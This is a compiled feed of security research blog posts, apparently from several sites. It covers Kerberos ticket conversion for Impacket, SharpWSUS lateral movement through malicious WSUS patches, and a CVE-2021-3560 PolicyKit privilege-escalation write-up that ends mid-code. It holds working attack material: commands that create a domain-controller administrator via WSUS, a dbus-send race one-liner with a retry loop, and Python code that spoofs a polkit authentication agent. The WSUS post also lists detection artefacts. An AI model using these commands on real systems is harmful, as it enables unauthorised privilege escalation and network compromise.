
Perform a Nessus scan via port forwarding rules only

By: voidsec
13 March 2020 at 09:34

This post will be a bit different from the usual technical stuff, mostly because I was not able to find any reliable solution on the Internet and I would like to help other people who have the same doubt/question. It's nothing advanced, just something useful that I didn't see posted before. During a recent engagement I […]

The post Perform a Nessus scan via port forwarding rules only appeared first on VoidSec.

Rubeus to Ccache

17 May 2020 at 15:20

Rubeus to Ccache

I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you've done any network penetration testing, red teaming, or Hack The Box/CTFs, you've probably come across Rubeus. It's a fantastic tool for all things Kerberos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the file type commonly used by Mimikatz. The Base64 encoding makes it very easy to copy, paste, and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64 encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/[email protected] -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.
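If you prefer to script those two steps yourself rather than use the tool, the conversion is easy to reproduce. Below is a minimal sketch (not RubeusToCcache itself; the ticket_converter.py path and the file names are placeholders):

import base64
import subprocess
import sys

b64_blob, kirbi_path, ccache_path = sys.argv[1], sys.argv[2], sys.argv[3]

# Decode the Base64 blob that Rubeus printed and write it out as a .kirbi file.
with open(kirbi_path, "wb") as f:
    f.write(base64.b64decode(b64_blob))

# Hand the .kirbi to Zer1t0's ticket_converter.py to produce the .ccache.
subprocess.run(["python", "ticket_converter.py", kirbi_path, ccache_path], check=True)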

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, such as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the heavy lifting.

EncFSGui – GUI Wrapper around encfs for OSX

Introduction: 3 weeks ago, I posted a rant about my frustration/concern related to crypto tools, more specifically the lack of tools to implement crypto-based protection for files on OSX in a point-&-click, user-friendly way.  I listed my personal functional and technical criteria for such tools and came to the conclusion that the industry seems to […]

The post EncFSGui – GUI Wrapper around encfs for OSX first appeared on Corelan Cybersecurity Research.

Exploiting System Mechanic Driver

By: voidsec
14 April 2021 at 13:30

Last month we (last & VoidSec) took the amazing Windows Kernel Exploitation Advanced course from Ashfaq Ansari (@HackSysTeam) at NULLCON. The course was very interesting and covered core kernel space concepts as well as advanced mitigation bypasses and exploitation. There was also a nice CTF and its last exercise was: “Write an exploit for System […]

The post Exploiting System Mechanic Driver appeared first on VoidSec.

Homemade Fuzzing Platform Recipe

By: voidsec
25 August 2021 at 13:11

It’s no secret that, since the beginning of the year, I’ve spent a good amount of time learning how to fuzz different Windows software, triaging crashes, filling CVE forms, writing harnesses and custom tools to aid in the process. Today I would like to sneak peek into my high-level process of designing a Homemade Fuzzing […]

The post Homemade Fuzzing Platform Recipe appeared first on VoidSec.

Terminus Project launch.

By: ReWolf
29 November 2015 at 01:04
I would like to announce the launch of my new web-based tool: Terminus Project. It's an automatically generated diff of Windows structures with a nice (I hope!) presentation layer. Currently it contains only data gathered from NTDLL PDBs (281 DLLs at the moment of writing this post), but it can easily be extended with other libraries. The idea behind […]

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

Statically encrypt strings in a binary with Keystone, LIEF and radare2/rizin

By: plowsec
11 April 2022 at 10:09
In our journey to try and make our payload fly under the radar of antivirus software, we wondered if there was a simple way to encrypt all the strings in a binary, without breaking anything. We did not find any satisfying solution in the literature, and the project looked like a fun coding exercise so … Continue reading Statically encrypt strings in a binary with Keystone, LIEF and radare2/rizin

Engineering antivirus evasion (Part III)

By: plowsec
19 April 2022 at 10:05
Previous blog posts addressed the issue of static artefacts that can easily be caught by security software, such as strings and API imports. This one provides an additional layer of obfuscation to target another kind of detection mechanism used to monitor a program's activity, i.e. userland hooks. As usual, source code was published at https://github.com/scrt/avcleaner … Continue reading Engineering antivirus evasion (Part III)

Introducing SharpWSUS

5 May 2022 at 09:00

Today, we’re releasing a new tool called SharpWSUS.  This is a continuation of existing WSUS attack tooling such as WSUSPendu and Thunder_Woosus. It brings their complete functionality to .NET, in a way that can be reliably and flexibly used through command and control (C2) channels, including through PoshC2.

The Background to SharpWSUS

During a recent red team engagement, a client wanted to see if a backup server could be compromised. The backup server was critical to the organisation and had consequently been the target of several rounds of red teaming and subsequent remediation, making compromise difficult. During this engagement, we found that the backup server had been removed from Active Directory (AD) and was also segmented from the network, making common lateral movement techniques unsuitable. The only common path seen was Remote Desktop Protocol (RDP) from certain hosts on the network to the target server with a local account. However, no local account was identified during the engagement. With this in mind, we looked for other avenues, for example leveraging servers that would need to connect to all other servers in the environment, and which would need to authenticate and issue code in some way. Enter Windows Server Update Services (WSUS).

Download SharpWSUS

GitHub: https://github.com/nettitude/SharpWSUS

WSUS Introduction

WSUS is a Microsoft solution for administrators to deploy Microsoft product updates and patches across an environment in a scalable manner, using a method where the internal servers do not need to reach out to the internet directly. WSUS is extremely common within Windows corporate environments.

WSUS Architecture

Typically, the architecture of WSUS deployments is quite simple, although they can be configured in more complex ways. The most common deployment consists of one WSUS server within the corporate network. This server will reach out to Microsoft over HTTP and HTTPS to download Microsoft patches. After downloading these, the WSUS server will deploy the patch to clients as they check in to the WSUS server. Communication between the WSUS server and the clients will occur on port 8530 for HTTP and 8531 for HTTPS. An example of this deployment is below:

[Diagram: single WSUS server deployment]

This image is from https://docs.microsoft.com/de-de/security-updates/windowsupdateservices/18127657.
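As a quick aside, whether a host is actually listening on the default WSUS ports mentioned above can be checked with a few lines of code. A minimal sketch (the host name is a placeholder):

import socket

host = "wsus.corp.local"   # placeholder: the suspected WSUS server
for port in (8530, 8531):  # default WSUS HTTP/HTTPS ports
    with socket.socket() as s:
        s.settimeout(3)
        state = "open" if s.connect_ex((host, port)) == 0 else "closed/filtered"
    print(f"{host}:{port} {state}")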

In a more complex deployment of WSUS, there may be one main WSUS server that communicates over the internet to Microsoft, then internally the main WSUS server pushes the patches out to other internal WSUS servers, which then deploy it to clients. In this scenario the WSUS server connecting to the internet would be known as the Upstream Server, and the WSUS servers that do not have internet access and get their patches from the Upstream Server would be Downstream Servers. An example diagram of this is below:

[Diagram: upstream/downstream WSUS deployment]

This image is from https://docs.microsoft.com/de-de/security-updates/windowsupdateservices/18127657.

The most common deployment seen is a single WSUS server deploying patches to all clients within the estate. This deployment means that one server in the environment can communicate with all servers and clients managed by WSUS, which makes WSUS a very attractive target for bypassing network segmentation.

SharpWSUS

Attacks on WSUS are nothing new and there is already fantastic tooling out there for abusing WSUS for lateral movement such as WSUSPendu (https://github.com/AlsidOfficial/WSUSpendu), which is the PowerShell script that formed the basis for this tool. There is also another .NET tool publicly available called Thunder_Woosus (https://github.com/ThunderGunExpress/Thunder_Woosus) which aimed to take some functionality from WSUSPendu and port it to .NET.

SharpWSUS is a continuation of this tooling and aims to bring the complete functionality of WSUSPendu and Thunder_Woosus to .NET in a tool that can be reliably used through C2 channels and offers flexibility to the operator.

The flow of using SharpWSUS for lateral movement is as follows:

  • Locate the WSUS server and compromise it.
  • Enumerate the contents of the WSUS server to determine which machines to target.
  • Create a WSUS group.
  • Add the target machine to the WSUS group.
  • Create a malicious patch.
  • Approve the malicious patch for deployment.
  • Wait for the client to download the patch.
  • Clean up after the patch is downloaded.

Locating the WSUS server

The WSUS server that a client is using can be found by querying the following registry key:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate

This key will be present on any workstation or server managed through WSUS. Since the most common deployment is a single WSUS server, there is a good chance that the server named in the key is the same one used for critical servers.
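For reference, the same lookup can also be done by hand; a minimal sketch, assuming the usual "WUServer" value name under that key:

import winreg

key_path = r"Software\Policies\Microsoft\Windows\WindowsUpdate"
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
    server, _ = winreg.QueryValueEx(key, "WUServer")  # e.g. http://wsus.corp.local:8530
print("WSUS server:", server)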

This can be enumerated through SharpWSUS using SharpWSUS.exe locate.

[Screenshot]

Enumerating the WSUS server

Once the WSUS server is compromised, SharpWSUS can be used to enumerate various details about the WSUS deployment, such as the computers being managed by the current server, the last time each computer checked in for an update, any Downstream Servers, and the WSUS groups.

This is done through the command SharpWSUS.exe inspect.

[Screenshot]

This provides the information needed to choose which machine to target in the environment. For example, within this environment the WSUS server managed the Domain Controllers, such as bloredc2.blorebank.local. This is a common configuration of WSUS, and the WSUS server is often not treated as being as critical as the Domain Controllers or other assets it manages. For this demo we will compromise the Domain Controller by adding a new local administrator.

Lateral Movement

A key consideration with WSUS lateral movement is that there is no way to control from the server when a client checks in. This means that once a patch is deployed, the lateral movement won't succeed until the client installs the update. Oftentimes the client will check in for patches on a regular cycle, for example daily, but the patches won't be installed until a patching day that might happen once a month. Some clients may be configured to install patches immediately if their priority level is high enough.

The first step of abusing WSUS is to create the malicious patch, which does have some limitations. When creating the patch, there are various values that can be configured through the command line in SharpWSUS, allowing the operator to change the Indicators of Compromise (IoCs) of the patch. There is also a value for the payload and its arguments. The payload must be a Microsoft-signed binary, and it must point to a location on disk on the WSUS server where that binary resides.

While the need for a signed binary can limit some attack paths, there are still plenty of binaries that could be used, such as PsExec.exe to run a command as SYSTEM, RunDLL32.exe to run a malicious DLL on a network share, MsBuild.exe to fetch and execute a remote payload, and more. The example in this blog will use PsExec.exe for code execution (https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).

A patch leveraging PsExec.exe can be created with the following command:

SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"

Note that the way the quotes are escaped will change based on how you are executing the command. The escaping above is the command used within PoshC2.

[Screenshot]

Note the GUID returned by the command: it is the Update ID of the patch and will be needed for further commands, including clean-up.

This malicious patch uses the PsExec.exe binary stored on the WSUS server which was uploaded through the C2. This patch will add a new user with the username WSUSDemo and grant them administrative rights over whichever machine it is installed on.

When the patch is created, it will be visible in the WSUS console. The newly created patch can be seen below:

[Screenshot]

If the patch is clicked, then more information can be seen:

[Screenshot]

As part of the patch creation process, the binary used in the patch is also copied to the WSUS content location and named "wuagent.exe". In this case the WSUS content location is "C:\UPDATES\WsusContent", and the binary will be copied to "C:\UPDATES\wuagent.exe". This allows it to be collected by the WSUS client. If the binary is executed, the PsExec.exe help menu is shown, proving it's just a copy of the signed Windows binary.

[Screenshot]

After the patch is made, the next steps are to create a group, add the target computer to the group, and then deploy the patch to that group. This is because WSUS patches are approved per WSUS group and not per machine. To target a specific machine, it is therefore necessary to ensure that the machine is in a group with no other machines.

This can all be done with a single SharpWSUS command:

SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group", where the updateid GUID is the one provided in the output of the create command.

[Screenshot]

This will check if the group “Demo Group” exists and create it if it doesn’t. It will then add the Domain Controller to the group and approve the malicious patch for the group.

You can confirm the group has been created by running the inspect command again.

[Screenshot]

This can also be seen in the WSUS console.

[Screenshot]

After this it is a waiting game for the client to download and install the patch. SharpWSUS can be used to enumerate the status of the update:

SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local, where the updateid is the same as before.

[Screenshot]

This value is slow to update and can be unreliable; it behaves the same way in the WSUS console, so it seems WSUS is simply not very efficient at tracking patch status. Until the target computer next checks in, the value will not be populated, so the message above is returned.

To speed up the demo, the client will be forced to check for updates.

[Screenshot]

This showed important updates to be installed…

[Screenshot]

… including the malicious patch.

[Screenshot]

Checking the local Administrators group of the DC to make sure there is no conflicting user:

[Screenshot]

Then the patch is installed:

[Screenshot]

The new local administrator was made on the Domain Controller!

[Screenshot]

Once the patch is installed on the target machine, the client will be able to see the following information.

[Screenshot]

If they click on the title of the update they will be taken to the details for the patch.

[Screenshot]

Once the client has checked in, the status will be updated. This is still delayed and can take time to change in the database; the value seems to be updated when the computer next checks in after the patch is installed, which can take a few check-ins.

[Screenshot]

Once the patch is installed, clean-up can be performed with the following SharpWSUS command:

SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"

[Screenshot]

This will decline the patch, delete the patch, remove the target from the group and delete the group.

Looking at the WSUS console, it can be seen that the group has been removed.

[Screenshot]

If the patch is explicitly searched for within WSUS, it is no longer there.

[Screenshot]

It should be noted that the patch binary "wuagent.exe" will remain on disk, and it is up to the operator to delete it manually.

Protecting Against WSUS Abuse

Lateral movement through WSUS is not a new technique; however, it is an option that will likely remain available to attackers for some time. Whilst it is not possible to prevent an attacker with local SYSTEM access on the WSUS server from abusing it in this way, it is possible to understand the attack path and take precautions.

The best defence against this would be segmenting the WSUS server from the network so that the server itself is more difficult to compromise, along with implementing a tiered WSUS structure with Upstream and Downstream Servers so that clients can be distributed between each relevant WSUS server.

Segmentation of the WSUS servers from the network makes the WSUS server more difficult to compromise and can force an attacker down a specific path that could be detected. Separating clients out to different WSUS servers limits where an attacker can laterally move to after compromising a Downstream Server.

Various artefacts exist that may present an opportunity for detection:

  • A new WSUS group with one host is likely to be created. For mass ransomware-type attacks this may instead be all hosts added to a new group.
    • The default group name within SharpWSUS is “InjectGroup”
  • The malicious patch itself and its metadata could all present detection opportunities when looking for patches outside of the normal Microsoft patches. The default patch created by SharpWSUS will have the following metadata:
    • Title: “SharpWSUS Update”
    • Date: “2021-09-26”
    • Rating: “Important”
    • KB: “5006103”
    • Description: “Install this update to resolve issues in Windows.”
    • URL: “https://www.nettitude.com”
  • When the patch is created, a Microsoft-signed binary will be copied to the WSUS web root. If the WSUS content location was C:\Updates\WSUSContent, for example, then the signed binary would be placed in C:\Updates\WUAgent.exe. This binary will not be removed after the patch is deleted, so this binary on disk could provide detection cases for WSUS being abused and may indicate what the abuse was (such as PsExec.exe, MsiExec.exe, etc.).
  • When the WSUS patch is approved, the user that approved it is stored and can be seen in the console. This is often "WUS Server", and that is what SharpWSUS will use. If your environment uses a different approval user, then this could stand out.

Summary

WSUS is a core part of Windows environments and is very often deployed in a way that would allow an attacker to use it to bypass internal networking restrictions. This blog has not detailed any new attack techniques, but the release of SharpWSUS (https://github.com/nettitude/SharpWSUS) aims to help offensive security professionals utilise this attack path through C2 to demonstrate the risks and drive improvement.

Download SharpWSUS

GitHub: https://github.com/nettitude/SharpWSUS

The post Introducing SharpWSUS appeared first on Nettitude Labs.

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

By: RicterZ
27 May 2022 at 08:52
A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

 

English Version: http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation-en

0x01. The Vulnerability

CVE-2021-3560 stems from PolicyKit not handling an error correctly: if a program closes immediately after sending a D-Bus message, PolicyKit mistakenly treats the sender of the message as the root user, so the permission check passes and privileges can be escalated. The vulnerability is exploited as follows:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply \
    /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
    string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!

The command above sends a D-Bus message and then kills the process with kill after an extremely short delay. After retrying the race condition a number of times, a low-privileged user can add a new user that has sudo rights.
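Because the window is only a few milliseconds wide, the race normally has to be retried many times. A minimal sketch of such a retry loop (the delay values are illustrative, not taken from the original advisory):

import subprocess
import time

# Same dbus-send call as above, killed after a few milliseconds, in a loop.
cmd = ["dbus-send", "--system", "--dest=org.freedesktop.Accounts", "--type=method_call",
       "--print-reply", "/org/freedesktop/Accounts", "org.freedesktop.Accounts.CreateUser",
       "string:boris", "string:Boris Ivanovich Grishenko", "int32:1"]

for attempt in range(200):
    delay = 0.005 + (attempt % 10) * 0.001   # sweep the kill delay around a few milliseconds
    proc = subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    time.sleep(delay)
    proc.kill()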

According to the original author's description and exploitation method, successful exploitation requires three components:

  1. The Accounts Daemon, the service used to add users;
  2. GNOME Control Center, which annotates the Accounts Daemon's methods with org.freedesktop.policykit.imply;
  3. PolicyKit ≥ 0.113.

However, the Accounts Daemon and GNOME Control Center do not exist on non-desktop systems, Red Hat Linux, and similar systems, which certainly reduces the exploit's coverage.

However, after studying the root cause of this vulnerability in depth, I found that exploitation is not particularly constrained: systems that only have PolicyKit and some basic D-Bus services (such as org.freedesktop.systemd1) can still be exploited successfully. During the research I found that quite a few topics are involved, and a deep understanding of the bug itself as well as PolicyKit's authentication mechanisms and workflow is required. This article aims to describe the overall research method in as much detail as possible; corrections are welcome.

0x02. Do We Really Need an Imply-Annotated Action?

The original author's write-up (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/) explicitly states:

The authentication bypass depends on the error value getting ignored. It was ignored on line 1121, but it's still stored in the error parameter, so it also needs to be ignored by the caller. The block of code above has a temporary variable named implied_error, which is ignored when implied_result isn't null. That's the crucial step that makes the bypass possible.

The gist is that a method annotated with org.freedesktop.policykit.imply is required to achieve the authentication bypass. Judging from the PoC in that article, this does indeed seem beyond question. The reason is closely tied to the root cause of the bug and is best understood from the code. Let's first look at the vulnerable function of CVE-2021-3560; the code below is based on polkit 0.115 from GitHub:

static gboolean
polkit_system_bus_name_get_creds_sync (PolkitSystemBusName           *system_bus_name,
               guint32                       *out_uid,
               guint32                       *out_pid,
               GCancellable                  *cancellable,
               GError                       **error)
{

  // ...
  g_dbus_connection_call (connection,
        "org.freedesktop.DBus",       /* name */
        "/org/freedesktop/DBus",      /* object path */
        "org.freedesktop.DBus",       /* interface name */
        "GetConnectionUnixUser",      /* method */
        // ...
        &data);
  g_dbus_connection_call (connection,
        "org.freedesktop.DBus",       /* name */
        "/org/freedesktop/DBus",      /* object path */
        "org.freedesktop.DBus",       /* interface name */
        "GetConnectionUnixProcessID", /* method */
        // ...
        &data);

  while (!((data.retrieved_uid && data.retrieved_pid) || data.caught_error))
    g_main_context_iteration (tmp_context, TRUE);

  if (out_uid)
    *out_uid = data.uid;
  if (out_pid)
    *out_pid = data.pid;
  ret = TRUE;

  return ret;
}


After calling the two D-Bus methods, polkit_system_bus_name_get_creds_sync does not handle data.caught_error and directly sets *out_uid to data.uid. Since data.uid was never filled in, out_uid ends up as 0, which is the uid of the root user, so the process is wrongly considered to be running as root.

Note, however, that when an error occurs data.error is set to the error information, so this only works if the calling function merely checks whether ret is TRUE and never looks at the error. Fortunately, check_authorization_sync, a very widely used function within PolicyKit, does exactly that:

static PolkitAuthorizationResult *
check_authorization_sync (PolkitBackendAuthority         *authority,
                          PolkitSubject                  *caller,
                          PolkitSubject                  *subject,
                          const gchar                    *action_id,
                          PolkitDetails                  *details,
                          PolkitCheckAuthorizationFlags   flags,
                          PolkitImplicitAuthorization    *out_implicit_authorization,
                          gboolean                        checking_imply,
                          GError                        **error)
{
  // ...
  user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,
                                                                         subject, NULL,
                                                                         error);
  /* special case: uid 0, root, is _always_ authorized for anything */
  if (identity_is_root_user (user_of_subject)) {
      result = polkit_authorization_result_new (TRUE, FALSE, NULL);
      goto out;
  }
  // ...
  if (!checking_imply) {
      actions = polkit_backend_action_pool_get_all_actions (priv->action_pool, NULL);
      for (l = actions; l != NULL; l = l->next) {
           // ...
           imply_action_id = polkit_action_description_get_action_id (imply_ad);
           implied_result = check_authorization_sync (authority, caller, subject,
                                                      imply_action_id,
                                                      details, flags,
                                                      &implied_implicit_authorization, TRUE,
                                                      &implied_error);
           if (implied_result != NULL) {
           if (polkit_authorization_result_get_is_authorized (implied_result)) {
               g_debug (" is authorized (implied by %s)", imply_action_id);
               result = implied_result;
               /* cleanup */
               g_strfreev (tokens);
               goto out;
           }
  // ...

This function is problematic in two places. The first is the initial call to polkit_backend_session_monitor_get_user_for_subject, which can return uid 0 and immediately pass the authorization check. The second occurs while checking imply actions: check_authorization_sync is called again in a loop and once more hits polkit_backend_session_monitor_get_user_for_subject returning uid 0. This function therefore offers two race-condition windows:

check_authorization_sync 
-> polkit_backend_session_monitor_get_user_for_subject 
 -> return uid = 0

check_authorization_sync
 -> check_authorization_sync
  -> polkit_backend_session_monitor_get_user_for_subject 
   -> return uid = 0

At this point in the analysis, the original author found that the first race window cannot be won, because the functions that subsequently call check_authorization_sync all check the error information. Only the second window can be exploited, which is why an action annotated with org.freedesktop.policykit.imply is required. Let's first explain what the org.freedesktop.policykit.imply annotation is.

PolicyKit action policy files usually live under /usr/share/polkit-1/actions/, and their contents look like this:

<?xml version="1.0" encoding="UTF-8"?> <!--*-nxml-*-->
<!DOCTYPE policyconfig PUBLIC "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN"
        "http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd">

<policyconfig>
        <vendor>The systemd Project</vendor>
        <vendor_url>http://www.freedesktop.org/wiki/Software/systemd</vendor_url>

        <action id="org.freedesktop.systemd1.manage-unit-files">
                <description gettext-domain="systemd">Manage system service or unit files</description>
                <message gettext-domain="systemd">Authentication is required to manage system service or unit files.</message>
                <defaults>
                        <allow_any>auth_admin</allow_any>
                        <allow_inactive>auth_admin</allow_inactive>
                        <allow_active>auth_admin_keep</allow_active>
                </defaults>
                <annotate key="org.freedesktop.policykit.imply">org.freedesktop.systemd1.reload-daemon org.freedesktop.systemd1.manage-units</annotate>
        </action>

        <action id="org.freedesktop.systemd1.reload-daemon">
                <description gettext-domain="systemd">Reload the systemd state</description>
                <message gettext-domain="systemd">Authentication is required to reload the systemd state.</message>
                <defaults>
                        <allow_any>auth_admin</allow_any>
                        <allow_inactive>auth_admin</allow_inactive>
                        <allow_active>auth_admin_keep</allow_active>
                </defaults>
        </action>

</policyconfig>

Notice that the action org.freedesktop.systemd1.manage-unit-files carries the org.freedesktop.policykit.imply annotation. The annotation means that when a subject is authorized for org.freedesktop.systemd1.reload-daemon or org.freedesktop.systemd1.manage-units, it is also authorized for this action. An annotated action can therefore essentially be treated as equivalent to the actions it references; that is what the annotation is for.
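To see which imply-annotated actions exist on a given system, the policy directory can simply be scanned; a minimal sketch:

import glob
import xml.etree.ElementTree as ET

# List every action that carries the org.freedesktop.policykit.imply annotation.
for path in glob.glob("/usr/share/polkit-1/actions/*.policy"):
    for action in ET.parse(path).getroot().iter("action"):
        for ann in action.iter("annotate"):
            if ann.get("key") == "org.freedesktop.policykit.imply":
                print(action.get("id"), "implies", ann.text)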

That said, check_authorization_sync is not the only higher-level function affected by this bug; all of the following functions are affected:

  1. polkit_system_bus_name_get_creds_sync
  2. polkit_backend_session_monitor_get_user_for_subject
  3. check_authorization_sync

By searching the code, I found a function that is very familiar to me calling polkit_backend_session_monitor_get_user_for_subject: polkit_backend_interactive_authority_authentication_agent_response.

static gboolean
polkit_backend_interactive_authority_authentication_agent_response (PolkitBackendAuthority   *authority,
                                                              PolkitSubject            *caller,
                                                              uid_t                     uid,
                                                              const gchar              *cookie,
                                                              PolkitIdentity           *identity,
                                                              GError                  **error)
{

  // ...
  identity_str = polkit_identity_to_string (identity);
  g_debug ("In authentication_agent_response for cookie '%s' and identity %s",
           cookie,
           identity_str);
  user_of_caller = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,
                                                                        caller, NULL,
                                                                        error);

  /* only uid 0 is allowed to invoke this method */
  if (!identity_is_root_user (user_of_caller)) {
      goto out;
  }
  // ...

This is the method PolicyKit uses to handle the AuthenticationAgentResponse and AuthenticationAgentResponse2 calls made by an Authentication Agent. So what is an Authentication Agent, and what does it do?

0x03. What Is an Authentication Agent?

In everyday Linux use, if you are not logged into the desktop environment as root and you perform an operation that requires root privileges, a dialog usually pops up asking for your password. The program behind that dialog is an Authentication Agent:

[Screenshot]

There are Authentication Agents for the command line as well, for example the pkexec command:

[Screenshot]

An Authentication Agent is usually a setuid program, which guarantees that the caller of PolicyKit's authorization methods is root, and method calls coming from the root user can be trusted. The Authentication Agent's authentication flow is as follows:

[Diagram]

  1. When the client needs elevated privileges, it launches a setuid Authentication Agent;
  2. The Authentication Agent starts a D-Bus service to receive authentication-related calls from PolicyKit;
  3. The Authentication Agent registers itself with PolicyKit so that it will handle the authentication requests (CheckAuthorization) triggered by the D-Bus methods the client program calls;
  4. When PolicyKit receives a CheckAuthorization request, it calls the Authentication Agent's BeginAuthentication method;
  5. Upon receiving that call, the Authentication Agent asks the user to enter their password for authentication;
  6. If the password checks out, the Authentication Agent calls the AuthenticationAgentResponse method provided by PolicyKit;
  7. When PolicyKit receives the AuthenticationAgentResponse call, it checks whether the caller is root and then verifies the other information (the cookie);
  8. If everything checks out, PolicyKit returns TRUE to the D-Bus service's CheckAuthorization call, indicating that authentication passed;
  9. On receiving that result, the D-Bus service allows the method the user called to be executed.

Although the flow is somewhat involved, it is easy to see that the trust in the whole process rests mainly on step 7, where the caller of AuthenticationAgentResponse is verified to be root. CVE-2021-3560 breaks exactly this trust, so by spoofing the caller of AuthenticationAgentResponse we can complete the entire authentication flow and call arbitrary D-Bus service methods.

0x04. Write Your Agent

Using dbus-python and the related example code, we can implement a basic skeleton of an Authentication Agent:

import os
import dbus
import dbus.service
import threading

from gi.repository import GLib
from dbus.mainloop.glib import DBusGMainLoop


class PolkitAuthenticationAgent(dbus.service.Object):
    def __init__(self):
        bus = dbus.SystemBus(mainloop=DBusGMainLoop())
        self._object_path = '/org/freedesktop/PolicyKit1/AuthenticationAgent'
        self._bus = bus
        with open("/proc/self/stat") as stat:
            tokens = stat.readline().split(" ")
            start_time = tokens[21]

        self._subject = ('unix-process',
                         {'pid': dbus.types.UInt32(os.getpid()),
                          'start-time': dbus.types.UInt64(int(start_time))})

        bus.exit_on_disconnect = False
        dbus.service.Object.__init__(self, bus, self._object_path)
        self._loop = GLib.MainLoop()
        self.register()
        print('[*] D-Bus message loop now running ...')
        self._loop.run()

    def register(self):
        proxy = self._bus.get_object(
                'org.freedesktop.PolicyKit1',
                '/org/freedesktop/PolicyKit1/Authority')
        authority = dbus.Interface(
                proxy,
                dbus_interface='org.freedesktop.PolicyKit1.Authority')
        authority.RegisterAuthenticationAgent(self._subject,
                                              "en_US.UTF-8",
                                              self._object_path)
        print('[+] PolicyKit authentication agent registered successfully')
        self._authority = authority

    @dbus.service.method(
            dbus_interface="org.freedesktop.PolicyKit1.AuthenticationAgent",
            in_signature="sssa{ss}saa{sa{sv}}", message_keyword='_msg')
    def BeginAuthentication(self, action_id, message, icon_name, details,
                            cookie, identities, _msg):
        print('[*] Received authentication request')
        print('[*] Action ID: {}'.format(action_id))
        print('[*] Cookie: {}'.format(cookie))

        ret_message = dbus.lowlevel.MethodReturnMessage(_msg)
        message = dbus.lowlevel.MethodCallMessage('org.freedesktop.PolicyKit1',
                                                  '/org/freedesktop/PolicyKit1/Authority',
                                                  'org.freedesktop.PolicyKit1.Authority',
                                                  'AuthenticationAgentResponse2')
        message.append(dbus.types.UInt32(os.getuid()))
        message.append(cookie)
        message.append(identities[0])
        self._bus.send_message(message)


def main():
    threading.Thread(target=PolkitAuthenticationAgent).start()


if __name__ == '__main__':
    main()


Next, let's add some code to make a call:

import time  # needed for the sleep in main() below

def handler(*args):
    print('[*] Method response: {}'.format(str(args)))


def set_timezone():
    print('[*] Starting SetTimezone ...')
    bus = dbus.SystemBus(mainloop=DBusGMainLoop())
    obj = bus.get_object('org.freedesktop.timedate1', '/org/freedesktop/timedate1')
    interface = dbus.Interface(obj, dbus_interface='org.freedesktop.timedate1')
    interface.SetTimezone('Asia/Shanghai', True, reply_handler=handler, error_handler=handler)


def main():
    threading.Thread(target=PolkitAuthenticationAgent).start()
    time.sleep(1)
